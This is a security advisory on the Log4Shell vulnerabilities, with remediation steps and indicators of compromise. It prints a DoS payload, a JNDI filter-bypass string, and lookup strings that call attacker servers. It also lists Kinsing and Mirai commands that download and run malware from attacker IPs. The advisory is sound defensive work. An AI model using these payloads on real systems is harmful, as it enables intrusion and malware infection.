Log4Shell Multiple Critical Vulnerabilities: Updated Advisory

Originally published at: https://cloudsek.com/threatintelligence/log4shell-multiple-critical-vulnerabilities-updated-advisory/


Category Vulnerability Intelligence
Vulnerability Class Remote Code Execution(Unauthenticated)Restricted Remote Code ExecutionDenial Of Service
CVSS:3.0 Score 10(CVE-2021-44228)9(CVE-2021-45046)7.5(CVE-2021-4510)
TLP GREEN

Executive Summary

  • This is an updated advisory in context to the Log4Shell vulnerability advisory that CloudSEK sent out on 13 December 2021, covering significant criticalities emerging in this course of events.
  • The vulnerability is now being exploited by notorious ransomware groups such as Khonsari and Conti.
  • Log4j2 has had 3 high priority security patches in the last week alone, leading to increased threat severity.
  • Threat actors have significantly broadened the scan for the vulnerabilities, and multiple high-profile financially motivated threat groups have already piggybacked on the flaw, to execute significant attacks.
  • Users are recommended to update to version 2.17.0 or later of Log4j2.
![](upload://wvTJdRjbgG45suSyHzIOjufjtW5.png)![](upload://aJ7t8z3un634wzYxfDlSV6lZkYb.png)![](upload://wvTJdRjbgG45suSyHzIOjufjtW5.png)

Threat actors selling malware suited for the vulnerabilities, on Telegram channels

What is Log4j ?

Log4j2 is a Java-based logging library written in Java, used in various open-source libraries and extensively used in major software applications such as Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, Minecraft: Java Edition, Tencent QQ, HCL, VMware, Adobe, Atlassian, etc.

Timeline of Events

On 9 December 2021, a bug was disclosed with a PoC on the internet, dubbed Log4Shell, an RCE flaw (tracked as CVE-2021-44228). This was deemed as one of the most destructive vulnerabilities to have been discovered. And to mitigate this issue, a patch was released on 13 December 2021 (updated v2.15.0). 

This version was earlier reported to be vulnerable to DoS (Denial of Service) attacks, followed by which researchers confirmed that there are bypasses to the fix that was implemented and that made this version susceptible to the RCE flaw CVE-2021-45046 as well. To mitigate this flaw another patch was released that was also vulnerable to DoS attacks (CVE-2021-45105). Then a high priority security patch was released in v2.17.0, to mitigate all the vulnerabilities.

Vulnerability Analysis

CVE-2021-44228

The vulnerability in Log4j was caused due to a misconfiguration in JNDI (Java Naming and Directory Interface). The utility had no restrictions set for accessing LDAP (Lightweight Directory Access Protocol). The attackers could leverage this flaw to their advantage by making a GET request to any endpoint, to which the server responds with a remote Java class file. This remote Java class file when injected into the server, results in Remote Code Execution.

The Java library that does the logging, interprets a string as a command, instead of just writing it to the log. For example, an attacker could use a login page, placing the attack string in the username field where they know it will be logged.

This vulnerability affected version 2.0-beta9 to 2.14.1 and was fixed in version 2.15.0

CVE-2021-45046:

The vulnerability which was originally discovered on 13 December 2021 only had DoS as a potential attack vector and this vulnerability had a CVSS score of 3.7. Now, the score has been increased to 9, because in some of the non-default configurations it is still possible to achieve Remote Code Execution.

As an official workaround for CVE-2021-44228 it was advised to:

  • Set the system property, or

formatMsgNoLookups: true

  • Set the JVM parameter

JAVA_OPTS = -Dlog4j2.formatMsgNoLookups=true

These parameters were by default set to True in version 2.15.0. Bypasses were discovered to overcome these workarounds in certain circumstances.

“Only Pattern Layouts with a Context Lookup (for example, $${ctx:loginId}) are vulnerable to this. This page previously incorrectly mentioned that Thread Context Map pattern (%X, %mdc, or %MDC) in the layout would also allow this vulnerability.

While Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default, there are ways to bypass this and users should not rely on this.

This is an excerpt from the official Log4j security blog, which mentions the scenario in which v2.15.0 is also vulnerable to Remote Code Execution.

In this version, if the attacker input is being passed into the function

logger.info("String" + attackerData);

it will not result in a JNDI lookup. But the attacker will still have access if the vulnerable Log4j is using Thread Map Context :

ThreadContext.put("layout-pattern-value", attackerData);

The default properties in Log4j v2.15.0 only allowed local connections hence, the impact was minimal but if the attacker string was in the following the format,

${ctx:layout-pattern-value

this resulted in a recursive reference and allowed the attacker to reference his own server, which made the JNDI lookup to the malicious server possible, injecting Remote Java class file and achieving Remote Code Execution.

This vulnerability specifically affects v2.15.0 and any version from 2.0-beta9 to 2.14.1 using the official workaround mentioned above.

CVE-2021-45105:

This vulnerability is vulnerable to a DoS attack vector which an attacker can achieve using the self referential lookup flaw. It allows an attacker with control over Thread Context Map data to cause a DoS attack, when a crafted string is interpreted.

Sample Payload: curl https://vulnerable.server:8080 -H ‘X-Api-Version: ${${::-${::-$${::-$}}}}’

This vulnerability affects versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3)

Remediation Measures

To address this vulnerability, potential targets could follow these steps:

  1. Update to the latest version i.e. 2.17.0
  2. If users are not able to update Log4j2 to the latest version:
  • Removing JndiLookup class from the classpath

zip -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class

Please Note: It is advisable to update and patch to the latest version, as these workarounds might cause disruptions in your normal logging activity.

3.   In case, users are unable to update to the latest version, resort to the IMMA Model

  • Isolate
  • Minimize
  • Monitor 
  • Active Defense

Isolate the impacted systems to a vulnerable VLAN and deploy a Proxy Firewall with deep packet inspection to restrict the communication between the rest of the systems. Monitor for irregular patterns, look for unauthorized configuration changes and also look for port/ protocol mismatch in the infrastructure.

Please Note: If you’re filtering on “ldap”, “jndi”, or the ${lower:x} keywords, there are bypasses available, a sample payload can be:

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}}

Indicators Of Compromise

The following indicators of compromise are associated with observed exploitation activity targeting CVE-2021-44228.

USER-AGENT HTTP HEADERS

${jndi:ldap://015ed9119662[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://32fce0c1f193[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://3be6466b6a20[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://6c8d7dd40593[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://7faf976567f5[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://e86eafcf9294[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://80.71.158[.]12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

${jndi:ldap://45.155.205[.]23312344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}

IP Addresses

A list of malicious IP addresses detected for Apache Log4j RCE Attempts can be found here

KINSING MINING ACTIVITY

Commands:

curl -o /tmp/kinsing http://80.71.158.12/kinsing

curl -o /tmp/libsystem.so http://80.71.158.12/libsystem.so

curl -o /etc/kinsing http://80.71.158.12/kinsing

chmod 777 /tmp/kinsing

chattr -R -i /var/spool/cron

chmod +x /etc/kinsing

URLs

hxxp//45.137.155[.]55/ex[.]sh

hxxp//45.137.155[.]55/kinsing

hxxp//80.71.158[.]12/libsystem.so

hxxp//80.71.158[.]12/kinsing

hxxp//80.71.158[.]12/Exploit69ogQNSQYz.class

Hashes (SHA256)

8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef

6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b

c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

MIRAI INFECTION ACTIVITY

Mirai retrieval script (SHA256):

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 (lh[.]sh)

Binary retrieval/ execution commands

wget hxxp//62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;

wget hxxp//62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;

wget hxxp//62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

Mirai binary hashes (SHA256)

776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00

8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81

2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984

Mirai attacker IP address

62.210.130[.]250

Additional Malware Payload Hashes (SHA256)

0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049

19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d

2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec

2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984

39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129

5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28

6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b

63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9

6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05

715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7

776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00

8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81

a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce

b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778

b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0

c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40

c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799

e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80

fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0

Note: Refer to this collection of hashes

References